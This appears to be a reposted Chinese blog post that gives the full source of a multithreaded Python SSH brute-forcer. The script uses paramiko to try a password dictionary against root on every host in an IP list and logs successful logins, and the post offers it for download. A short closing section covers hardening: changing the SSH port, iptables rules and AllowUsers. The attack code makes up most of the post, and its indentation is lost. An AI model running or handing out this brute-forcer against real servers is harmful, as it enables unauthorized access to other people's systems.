zoukankan      html  css  js  c++  java
  • python多线程ssh爆破

    python多线程ssh爆破

    PythonPython



    0x01.About

    爆弱口令时候写的一个python小脚本,主要功能是实现使用字典多线程爆破ssh,支持ip表导入,字典数据导入。

    主要使用到的是python的paramiko模块和多线程threading模块。

    那么,首先要准备的是字典dict、服务器ip表。

    东西很简单,主要默认目录如下:

    |--ssh.scan.py
    |--/log:
        sshd
    |--/dict:
        ip
        password
    

    ip和password按照一行一个放置。



    0x02.Code

    下面上源码吧,文件保存为ssh.scan.py,查看使用方式:python ssh.scan.py -h

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    #!/usr/bin/python python
    # -*- coding: utf-8 -*-
    import paramiko,threading,sys,time,os

    class SSHThread(threading.Thread):
    def __init__(self, ip, port, timeout, dic, LogFile):
    threading.Thread.__init__(self)
    self.ip = ip
    self.port = port
    self.dict = dic
    self.timeout = timeout
    self.LogFile = LogFile
    def run(self):
    print("Start try ssh => %s" % self.ip)
    username = "root"
    try:
    password = open(self.dict).read().split(' ')
    except:
    print("Open dict file `%s` error" % self.dict)
    exit(1)
    for pwd in password:
    try:
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    ssh.connect(self.ip, self.port, username, pwd, timeout = self.timeout)
    print(" IP => %s, Login %s => %s " % (self.ip, username, pwd))
    open(self.LogFile, "a").write("[ %s ] IP => %s, port => %d, %s => %s " % (time.asctime( time.localtime(time.time()) ), self.ip, self.port, username, pwd))
    break
    except:
    print("IP => %s, Error %s => %s" % (self.ip, username, pwd))
    pass
    def ViolenceSSH(ip, port, timeout, dic, LogFile):
    ssh_scan = SSHThread(ip, port, timeout, dic, LogFile)
    ssh_scan.start()

    def main(ipFile, dic, log):
    if ipFile == "-h":
    help()
    try:
    ipText = open(ipFile).read().split(' ')
    for ip in ipText:
    if ip != '':
    time.sleep(0.5)
    threading.Thread(target = ViolenceSSH, args = (ip, 22, 1, dic, log, )).start()
    except:
    print("Open IP list file `%s` error" % ipFile)
    exit(1)
    def help():
    print("python ssh.scan.py 使用说明:
    python ssh.scan.py ip_file_path dict_file_path ssh_log_path ")
    exit(1)

    if __name__ == '__main__':

    fpath = os.path.dirname(os.path.abspath('__file__'))
    ipFile = sys.argv[1] if len(sys.argv) > 1 else fpath+"/dict/ip"
    dic = sys.argv[2] if len(sys.argv) > 2 else fpath+"/dict/password"
    log = sys.argv[3] if len(sys.argv) > 3 else fpath+"/log/sshd"
    try:
    os.system("clear")
    main(ipFile, dic, log)
    except KeyboardInterrupt:
    exit(1)

    结果比较丑,自己爆自己服务器:

    爆破结果爆破结果



    0x03.Solution

    怎么办呢?防止被人爆菊,那就修改ssh默认登陆端口吧。修改方式主要是修改ssh配置文件:

    1.修改iptables

    首先要过防火墙,修改防火墙规则:

    /sbin/iptables -A INPUT -m state --state NEW -m tcp -p tcp --dport 2333 -j ACCEPT

    保存规则:

    service iptables save

    重启防火墙:

    service iptables restart

    2.修改ssh配置文件

    cp /etc/ssh/ssh_config /etc/ssh/ssh_config.bak
    cp /etc/ssh/sshd_config /etc/ssh/sshd_config.bak

    修改ssh端口:

    vim /etc/ssh/sshd_config

    在端口#Port 22下面增加Port 2333

    vim /etc/ssh/ssh_config

    在端口#Port 22下面增加Port 2333

    重启ssh服务:

    service sshd restart

    3.其他修改

    限制用户的SSH访问

    假设我们只要xiaocao和homeway用户能通过SSH使用系统,向sshd_config配置文件中添加

    vim /etc/ssh/sshd_config

    修改下面一行:

    AllowUsers xiaocao homeway

    代码下载地址:http://homeway.me/code/python-violence-ssh.zip


    from:小草

  • 相关阅读:
    git安装和简单配置
    IDEA调试服务器上部署的程序
    fastjson的@JSONField注解的一点问题
    Spring quartz定时任务service注入问题
    MySql 插入数据库报错 Incorrect string value: 'xF0xA0x86xA2'
    Window启动Zookeeper报错java.lang.NumberFormatException: For input string:
    wget命令下载文件
    遇见的面试题
    使用jackson来进行数组格式的json字符串转换成List。
    边距重叠的三种情况
  • 原文地址:https://www.cnblogs.com/staffyoung/p/5587160.html
Copyright © 2011-2022 走看看